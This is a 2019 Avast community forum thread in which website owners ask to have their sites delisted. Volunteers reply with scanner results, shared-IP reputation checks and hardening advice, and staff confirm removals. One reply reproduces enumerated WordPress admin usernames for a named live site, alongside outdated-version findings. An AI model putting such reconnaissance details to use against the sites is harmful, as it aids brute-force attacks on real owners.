Post by: DavidR on June 06, 2019, 01:22:49 AM
@  mjo_stluke
Have you reported it ?
Report Avast False Positive File or Website - please use https://www.avast.com/false-positive-file-form.php.
Title: Re: How to remove my website from your blacklist?
Post by: mjo_stluke on June 06, 2019, 01:35:54 AM
Thanks for the link. I have reported it now.

-Mark
Title: Re: How to remove my website from your blacklist?
Post by: DavidR on June 06, 2019, 02:42:19 AM
Quote from: mjo_stluke
Thanks for the link. I have reported it now.

-Mark

You're welcome. 

That should get to the virus labs team, where it may take a little time for one of the team to see it here.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 06, 2019, 06:23:56 PM
Probably the detection is because of the IP you share on a bad host,
see: https://ransomwaretracker.abuse.ch/ip/64.29.151.221/
&  https://www.abuseipdb.com/check/64.29.151.221
Re: https://www.threatminer.org/host.php?q=64.29.151.221
and https://www.projecthoneypot.org/ip_64.29.151.221
11 threats in this report: https://app.upguard.com/#/http://stlukesavl.org
Given as all green here: https://sitecheck.sucuri.net/results/stlukesavl.org
mind the TLS recommendations...

On CMS: WordPress Version
4.9.10
Version does not appear to be latest . Update now!

 User Enumeration
  The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   luke_admin   luke_admin
2   Patty Mouer   patty
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

This scan failed: https://sitecheck.sucuri.net/results/qxxa9kl8.myutilitydomain.com/xmlrpc.php
Not secure, avast flags: -http://qxxa9kl8.myutilitydomain.com/xmlrpc.php

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: furkaan23 on June 18, 2019, 10:42:05 PM
This site https://azra.com.tr seems to have been blacklisted by avast. How to fix this?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 18, 2019, 11:04:31 PM
Quote from: furkaan23
This site https://azra.com.tr seems to have been blacklisted by avast. How to fix this?

Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php

https://forum.avast.com/index.php?topic=14433.msg1289438#msg1289438



Title: Re: How to remove my website from your blacklist?
Post by: furkaan23 on June 19, 2019, 11:38:49 AM
Quote from: furkaan23
This site https://azra.com.tr seems to have been blacklisted by avast. How to fix this?

Quote from: Pondus
Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php

https://forum.avast.com/index.php?topic=14433.msg1289438#msg1289438

I made an application yesterday. When do I get results?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 19, 2019, 01:31:56 PM
Hi furkaan23,

Medium security risk is being reported here via TLS recommendations:
https://sitecheck.sucuri.net/results/https/azra.com.tr

Erlend Oftedal's scanner found 3 retirable jQuery libraries: https://retire.insecurity.today/#!/scan/d4e550d5f4172de10ce7ba9b4ad72ff0bcc811f82254b50427a0c704e4390171

Website scanned with a linter produced following 553 hints (general and security related):
https://webhint.io/scanner/1f21c397-2a25-4db5-afac-27054254a272

SSL not available, so vulnerable to MiM attacks,
Excessive info proliferation: X-Powered-By-header exposed,
Vulnerable to Cross-Site-Attacks, http-only-cookies not used,
SPF not enabled, so  not mail can be fraudulently sent. (source UpGuard cloud scanner results).

No alerts given here: https://urlquery.net/report/2d34b7e4-d6e7-4555-93e4-844f02485598
but as you see there alerts for other domains, that share your IP, probably reason avast flagged your site.

Wait for an avast team member to come and unblock,
do with the improvement recommendations, I gave here, as you see fit,
but work towards using "best policies".

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on June 20, 2019, 02:05:39 AM
Quote from: furkaan23
This site hxxps://azra.com.tr seems to have been blacklisted by avast. How to fix this?

Detection has been removed 19.06.2019

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided website isn't detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: Dave335 on July 18, 2019, 10:14:22 AM
Hi,

Our website has been blacklisted yet its clean - site https://rak.co.ke

Please HELP!DPM
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on July 18, 2019, 10:24:56 AM
-> https://sitecheck.sucuri.net/results/https/rak.co.ke
-> https://www.virustotal.com/gui/url/4b136d1232ed31a4d7fd5c2b49c013c3ff9aa70f32f6aea0937b9458a9f3d76a/detection
Title: Re: How to remove my website from your blacklist?
Post by: Milos on July 18, 2019, 01:32:18 PM
Hello,
report it through https://www.avast.com/false-positive-file-form.php, please.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: larry189 on July 25, 2019, 03:02:41 AM
I rebuild a site from another hosting location. It had a virus at the other location, but this is totally new, and I've tested it with all your suggested scanners, and checked it on the black list site, so they are not showing clean.  Do I need to do anything else to remove it from your black list??  site is

https://cjspaintballpark.com

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: mchain on July 25, 2019, 08:41:34 AM
Quote from: larry189
I rebuild a site from another hosting location. It had a virus at the other location, but this is totally new, and I've tested it with all your suggested scanners, and checked it on the black list site, so they are not showing clean.  Do I need to do anything else to remove it from your black list??  site is

https://cjspaintballpark.com

Thanks!

https://sitecheck.sucuri.net/results/https/cjspaintballpark.com
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 25, 2019, 11:18:21 PM
Now unreachable website.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on July 27, 2019, 12:20:09 AM
Quote from: larry189
I rebuild a site from another hosting location. It had a virus at the other location, but this is totally new, and I've tested it with all your suggested scanners, and checked it on the black list site, so they are not showing clean.  Do I need to do anything else to remove it from your black list??  site is

hxxps://cjspaintballpark.com

Thanks!

Detection has been removed

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided website isn't detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: Jaynie on July 31, 2019, 12:05:49 AM
Hello,

For some reason our website https://account.claimleader.com/  is reported as being in the Avast blacklist. We have never had an issue with this before with any other anti-virus software. The solution we are telling our clients is to remove Avast all together in order to use our website. They are adding our website to the "Exceptions" list but some are still having issues.

 Any help would be appreciated.

Thank you,
Jaynie
Title: Re: How to remove my website from your blacklist?
Post by: VladK on August 01, 2019, 01:39:37 PM
https://account.claimleader.com/ is unblocked, it was a false positive alert.
Title: My website is also blocked by avast.
Post by: Dan Horea on August 14, 2019, 11:00:50 AM
Hello!
I am the administrator of the www.carduri.uk website.

We had some problems in the past with this website and now we have cleaned it, moved the hosting provider and reconstruct the website from scratch.

When I try to access the website security check using the online tool provided by Sucuri https://sitecheck.sucuri.net/results/carduri.uk the only remaining problem of this website is that is blacklisted by your company.

So, please reanalyse the website and if there are still some problems with it tell me what those problems are, if not please remove the website from your blacklist, or tell me what do I need to do to achieve that.

Thank you very much!

Best regards,
Horea George Dan
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on August 14, 2019, 11:37:46 AM
You can report a suspected FP (File/Website) here: https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 14, 2019, 12:29:32 PM
Your WordPress version is outdated, update a.s.a.p. WordPress Version 4.9.10
Probably an IP flagged because of abuse by those that share this with you:
https://www.abuseipdb.com/check/31.14.13.135 and https://checkphish.ai/ip/31.14.13.135
Vulnerabilities: https://app.upguard.com/webscan#/http://www.carduri.uk/
DNS8 flags site as suspicious: https://app.upguard.com/webscan#/http://www.carduri.uk/

Site is flagged as a PHISH, wait for an avast team member to give the final verdict,
as we here are volunteers with relative knowledge, but cannot unblock.

polonus
Title: Re: My website is also blocked by avast.
Post by: jefferson sant on August 15, 2019, 03:16:33 PM
Hello!
I am the administrator of the wxw.carduri.uk website.

We had some problems in the past with this website and now we have cleaned it, moved the hosting provider and reconstructed the website from scratch.

When I try to access the website security check using the online tool provided by Sucuri https://sitecheck.sucuri.net/results/carduri.uk the only remaining problem of this website is that it is blacklisted by your company.

So, please reanalyse the website and if there are still some problems with it tell me what those problems are, if not please remove the website from your blacklist, or tell me what I need to do to achieve that.

Thank you very much!

Best regards,
Horea George Dan

Detection has been removed 14.08.2019

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided website isn't detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: trspencer on August 24, 2019, 04:36:09 AM
Hello -

https://www.mylakeshoredental.com was recently transferred to our environment from an infected host. New content, new hardware, nothing was transferred from the previous environment.

Can you please recheck site and remove from blacklist?

https://sitecheck.sucuri.net/results/https/www.mylakeshoredental.com

Thank you!
Tim
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on August 24, 2019, 04:45:20 AM
You can report a suspected FP (File/Website) here: https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 24, 2019, 04:44:16 PM
Found threats to site: https://app.upguard.com/webscan#/https/www.mylakeshoredental.com

Indicators of compromise (iocs): https://urlscan.io/result/8d158394-29f2-45c9-be21-7309d47928c9#iocs
But wait for a final verdict from an avast team member

Also consider: https://www.virustotal.com/gui/url/f9f771d0e34c4515454b75d5bb05e2438002745460771b60ae6ec5b3278a35d7/details

Certain improvement recommendations found via linting:
https://webhint.io/scanner/3fadf059-5704-40ab-a0de-fbb186d10991
https://urlscan.io/result/8d158394-29f2-45c9-be21-7309d47928c9

Nothing found: https://www.urlvoid.com/scan/mylakeshoredental.com/

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on August 26, 2019, 03:49:11 PM
Hello -

hxxps://www.mylakeshoredental.com was recently transferred to our environment from an infected host. New content, new hardware, nothing was transferred from the previous environment.

Can you please recheck site and remove from blacklist?

https://sitecheck.sucuri.net/results/https/www.mylakeshoredental.com

Thank you!
Tim

Detection was removed on 26.08.2019 08:43 AM.

Quote from: Avast
Our virus specialists have now cleared its reputation in our database.

With URLs this change should be instant, but it might take up to 24 hours with files.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 26, 2019, 08:48:24 PM
Thanks to jefferson sant for the apt status response.
we all here owe you for doing this, great job.  ;)

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on August 27, 2019, 04:29:25 AM
Thanks to jefferson sant for the apt status response.
we all here owe you for doing this, great job.  ;)

polonus

You're welcome. I have bad news: less time now for this in the next days :(
There is no doubt that they have been working at their best even if some are on vacation.

https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: SCompartir on September 10, 2019, 06:18:37 PM
Hello,

We need your help to review one of our sites.
Some users are receiving Avast phishing alerts on the following page: http://lms30.santillanacompartir.com/

I checked the link and it looks clean:
https://www.virustotal.com/gui/url/4ed49a96f5b774bb096c7adfb0f2fe88c3abb0660c18cc77ee5ed58f264bb69e/detection
https://www.urlvoid.com/scan/lms30.santillanacompartir.com/

Can you please remove it from the list?
thanks in advance
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 10, 2019, 10:16:26 PM
Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php



Title: Re: How to remove my website from your blacklist?
Post by: SCompartir on September 12, 2019, 05:58:27 PM
Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php

Thanks, Pondus.

We reported it yesterday but we still have no solution. It is an important issue that is causing problems in the schools that use our software.
Any help is very much appreciated.
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on September 12, 2019, 10:36:14 PM
Reported to Avast. Hope that helps.
Title: Re: How to remove my website from your blacklist?
Post by: Milos on September 13, 2019, 07:46:33 AM
Hello,
it should be fixed.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: heidiw on September 27, 2019, 07:49:21 PM
Hello, our site has been blacklisted but gets a clean report from every testing site, including virustotal.com and urlvoid.com. I've probably tested and retested on at least a dozen different sites with the same results.

I've submitted to Avast's "Report a False Positive" form linked above, but thought I'd check in here for additional guidance. Our site is hbsslaw.com.

Thank you in advance for any help,
Heidi
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 28, 2019, 11:36:53 AM
Hi heidiw,

Has that shellscript malware now left you?
Seems OK here: https://www.virustotal.com/gui/domain/hbsslaw.com/details

See various detections in communicating files and files referring:
https://www.virustotal.com/gui/ip-address/104.248.8.42/relations  (shellscript malware)
-> https://www.virustotal.com/gui/file/e1c40eab45d98265548859ffb3df941bb7329e01f5ddb08e3b98c3c1c3a83175/detection

Recommendations acquired via linting to improve your website:
https://webhint.io/scanner/ad92d914-488d-4594-bda6-0fe00ee5954a

See existing vulnerabilities on the hoster of the webserver for IP: https://www.shodan.io/host/104.248.8.42
N.B. The device at Clifton may not be impacted by all of these issues.
The vulnerabilities are implied based on the software and version.

Wait for the final verdict of an avast team member, as we here are volunteers with relative knowledge,
but only avast team members can come and unblock (whenever that is advisable)

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)


Title: Re: How to remove my website from your blacklist?
Post by: vickykuo on September 30, 2019, 04:02:31 AM
Hello

My company website "mydesigncell.com" is blocked by avast

But my website is safe now

Please remove my website from your blacklist

Thanks~~!!!
Title: Re: How to remove my website from your blacklist?
Post by: Michael (alan1998) on September 30, 2019, 05:33:17 AM
You're blacklisted by ZeroCERT >> https://www.urlvoid.com/scan/mydesigncell.com/
VirusTotal reports Suspicious >> https://www.virustotal.com/gui/url/9c3cef781db545947cdb87ee959c9d2504fe1394d9bdc2e47df29ffb0c0b9c29/detection

Sucuri reports outdated nginx >> https://sitecheck.sucuri.net/results/www.mydesigncell.com

One of your subdomains (share(dot)mydesigncell(dot)com) is tagged for malware.

Primary >> https://zulu.zscaler.com/report/f8cfb7aa-0a5f-45f4-bf3e-c419bdc51ac2
Share (SD) >> https://zulu.zscaler.com/submission/a74d1606-7a6d-4ac2-9088-85f1bbaad50c

Can't for the life of me get URLQuery.net working (@polonus)??

You had a spam problem at one point I take it? (>1 year old) >> https://exchange.xforce.ibmcloud.com/url/mydesigncell.com
JS:Downloader >> https://exchange.xforce.ibmcloud.com/malware/20FC20EE7D21686397F7CFFF968CDFA6

AW-SNAP! (https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=c2h8fXsubXkje3NbZ25ee2xsLl5dbQ%3D%3D~enc)

Wait for official reply from Avast!

Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 30, 2019, 01:17:57 PM
@ Michael (alan1998) & vickykuo,

Michael (alan1998) quite impressive in the scan results.
Walk in my shoes, a very present surprise for me.
Domain is at constant risk of being hijacked, that is the main threat there.

Also interesting are the detections, that one will get via Virustotal's relations on that IP,
see: https://www.virustotal.com/gui/ip-address/67.20.76.105/relations
and that "suspicious" domain is parading there as number 3 and 4 in the list:
https://www.virustotal.com/gui/url/73d01d1a40280ff5b32a5c6ec24b6e7c091c61d60035d1e8d8f85c40d9172cb4/detection
and https://www.virustotal.com/gui/url/e7ece1957115a109f44c349f9884b03a398058b070a6c7da4bd6e5582b2f8529/detection

The threats against this website, 12 immediate threats mentioned here: https://webscan.upguard.com/#/www.mydesigncell.com

One should be interested in URLQuery.net results because of it having Forcepoint Threatseeker aboard,
Emerging Threats and other IDS. URLQuery.net is not very popular with cybercriminals that wanna stay under the radar,
so it has come under continuous attack. Remember Clean-MX once, that is now only open for members with a personal account.

Here you got what you were after. However I won't reveal how I got there, as the baddies are looking over my shoulder as well:
https://urlquery.net/report/270ef31c-6fc1-410d-9120-9bcc462c88c5

As Michael (alan1998) said, wait for a reaction from an avast team member,
as they are the only ones to come and unblock,
we are just the folks with relative knowledge on website security and error-hunting.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: How to remove my website from your blacklist?
Post by: Michael (alan1998) on September 30, 2019, 01:26:40 PM
@ Michael (alan1998) & vickykuo,

Michael (alan1998) quite impressive in the scan results.
Walk in my shoes, a very present surprise for me.
Domain is at constant risk of being hijacked, that is the main threat there.

I'm still nowhere near your level :P. I'll see about reaching out to URLQuery and getting an account. Can't find an email, but DM'd them on Twitter. Their account doesn't appear active though :/
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 30, 2019, 02:00:19 PM
Hi Michael (alan 1998),

Don't be too modest now, you are one of my best adepts  ;)
Oh well, and you should know now how to get to these urlquery dot net results by now  8)

Damian
Title: Re: How to remove my website from your blacklist?
Post by: heidiw on September 30, 2019, 05:01:49 PM
Thank you, Polonus, for responding to my message.

I am not familiar with what shellscript malware is or what we can do to remove it. I'll send your message to our web development team and our internal IT team.

Are you available for hire to help us as a consultant? or could you recommend someone?

Thank you,
Heidi Waggoner
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 30, 2019, 05:46:26 PM
Quote
........ or could you recommend someone?
These guys know all there is to know   >>  https://sucuri.net/


Title: Re: How to remove my website from your blacklist?
Post by: heidiw on September 30, 2019, 10:04:33 PM
would https://sucuri.net/ know how to fix the issues too? or even better, be able to fix the issues?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 30, 2019, 10:30:14 PM
would https://sucuri.net/ know how to fix the issues too? or even better, be able to fix the issues?
You have to ask Sucuri 


Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on September 30, 2019, 11:23:29 PM

Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: jadaun011 on October 01, 2019, 10:35:38 AM
I was on a call with one of my customers and he was trying to access my website, but he sees the alert by Avast that "This website is unsafe".

My website was infected with malware a few months ago and it was completely cleaned a couple of weeks ago... and I see there are no malicious files or contents at the moment.


Here is my website URL: https://b2binternationalgroup.com/

Can you please check and help me with whitelisting of the website.

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: JimmyChen on October 01, 2019, 11:54:19 AM
Hello,

Our website vcloud-vrli.cloud-ii.com is reported as being in the Avast blacklist.

We are sure that our website is clean, having checked on www.urlvoid.com / www.virustotal.com; can you help remove it from your blacklist?

Sincerely,
Title: Re: How to remove my website from your blacklist?
Post by: Michael (alan1998) on October 01, 2019, 02:11:38 PM
I was on a call with one of my customers and he was trying to access my website, but he sees the alert by Avast that "This website is unsafe".

My website was infected with malware a few months ago and it was completely cleaned a couple of weeks ago... and I see there are no malicious files or contents at the moment.


Here is my website URL: https://b2binternationalgroup.com/

Can you please check and help me with whitelisting of the website.

Thanks!

Second time I've seen Nielsen associated (closely that is) with spam. The other attempt being a weird phishing email that a user got that I manage.

Your website has Directory Listing enabled (See here) >> https://sitecheck.sucuri.net/results/https/b2binternationalgroup.com
Zulu gives all clear >> https://zulu.zscaler.com/submission/ae71a267-6502-467e-b55f-58b7299667a1
URLVoid is OK >> https://www.urlvoid.com/scan/b2binternationalgroup.com/
URLScan gives Verdict: Unknown (not uncommon) >> https://urlscan.io/result/ed791ca7-bf99-46f0-8bee-09451821f16f
Spam issue from 2017 >> https://exchange.xforce.ibmcloud.com/url/b2binternational.com
XFE doesn't mind the IP >> https://exchange.xforce.ibmcloud.com/ip/146.66.102.157
VT clear URL >> https://www.virustotal.com/gui/url/210560ae46f78a67db067ccd85cbac03add5528e4392119ae40010e0875728d6/detection

Interesting that VT served a different IP compared to URLScan (related to Dynamic IP's found in XFE?) 212.84.78.149

XFE on new IP >> https://exchange.xforce.ibmcloud.com/ip/212.84.78.149
Aw-snap! (https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LmIyYltudHt9bnx0W11ufGwuXl1t~enc)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 01, 2019, 02:28:01 PM
Hi JimmyChen,

Your website does not kick up any content: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=dl5sXXUjLXZ9bFsuXmxddSMtW1suXl1t~enc
There is something wrong with the implementation: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=dl5sXXUjLXZ9bFsuXmxddSMtW1suXl1tYGxdZ1tuO2pze3NzW11uWyM9Xjc5ezF8RjAjODVeXnsjN3w4ezE4NjcxIzc4fDVCQjQ8bF1nW25VfWw9JTJGW24je3g%3D~enc  This due to a redirect.
No malware detected: https://www.virustotal.com/gui/url/15ac5f01217ab3c8143b5c2c9c0b1b364e23d141e0cdae7234532eab4ce757ca/detection
Neither here: https://www.virustotal.com/gui/ip-address/125.227.4.93/relations

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: jadaun011 on October 02, 2019, 04:11:31 PM
Hi,

I have fixed those "Directory Listing enabled" and other issues... if you can check again?

I was on a call with one of my customers and he was trying to access my website, but he sees the alert by Avast that "This website is unsafe".

My website was infected with malware a few months ago and it was completely cleaned a couple of weeks ago... and I see there are no malicious files or contents at the moment.


Here is my website URL: https://b2binternationalgroup.com/

Can you please check and help me with whitelisting of the website.

Thanks!

Second time I've seen Nielsen associated (closely that is) with spam. The other attempt being a weird phishing email that a user got that I manage.

Your website has Directory Listing enabled (See here) >> https://sitecheck.sucuri.net/results/https/b2binternationalgroup.com
Zulu gives all clear >> https://zulu.zscaler.com/submission/ae71a267-6502-467e-b55f-58b7299667a1
URLVoid is OK >> https://www.urlvoid.com/scan/b2binternationalgroup.com/
URLScan gives Verdict: Unknown (not uncommon) >> https://urlscan.io/result/ed791ca7-bf99-46f0-8bee-09451821f16f
Spam issue from 2017 >> https://exchange.xforce.ibmcloud.com/url/b2binternational.com
XFE doesn't mind the IP >> https://exchange.xforce.ibmcloud.com/ip/146.66.102.157
VT clear URL >> https://www.virustotal.com/gui/url/210560ae46f78a67db067ccd85cbac03add5528e4392119ae40010e0875728d6/detection

Interesting that VT served a different IP compared to URLScan (related to Dynamic IP's found in XFE?) 212.84.78.149

XFE on new IP >> https://exchange.xforce.ibmcloud.com/ip/212.84.78.149
Aw-snap! (https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LmIyYltudHt9bnx0W11ufGwuXl1t~enc)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 02, 2019, 04:24:20 PM
Google gives an all green verdict here: https://urlscan.io/result/4199a5d4-3b27-4ca1-9f30-ae5b8dab3b05
Still giving a PHISHing alert in Avast Secure Browser.
Showing site issues: https://sitecheck.sucuri.net/results/https/b2binternationalgroup.com

Update plug-ins when appropriate: The following plugins were detected by reading the HTML source of the WordPress site's front page.

wordpress-seo 12.1   latest release (12.2)
https://yoa.st/1uj
elementor 2.7.2   latest release (2.7.3)
https://elementor.com/
table-of-contents-plus 1601   latest release (1601)
http://dublue.com/plugins/toc/
sitepress-multilingual-cms   
tablepress 1.9.2   latest release (1.9.2)
https://tablepress.org/
genesis-responsive-slider 1.0.1   latest release (1.0.1)
https://www.studiopress.com
SD-mobile-nav

Reputation Check
PASSED
Google Safe Browse:OK
Spamhaus Check:OK
Abuse CC:OK
Dshield Blocklist:OK
Cisco Talos Blacklist:OK
Web Server:
-nginx
X-Powered-By:
None
IP Address:
-146.66.102.157
Hosting Provider:
SoftLayer Technologies Inc.
Shared Hosting:
1 sites found on -146.66.102.157

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on October 07, 2019, 02:16:07 PM
I was on a call with one of my customers and he was trying to access my website, but he sees the alert by Avast that "This website is unsafe".

My website was infected with malware a few months ago and it was completely cleaned a couple of weeks ago... and I see there are no malicious files or contents at the moment.


Here is my website URL: hxtps://b2binternationalgroup.com/

Can you please check and help me with whitelisting of the website.

Thanks!

Detection was removed on 07.10.2019 at 05:14 AM.

Quote from: Avast
Our virus specialists have now cleared its reputation in our database.

With URLs this change should be instant, but it might take up to 24 hours with files.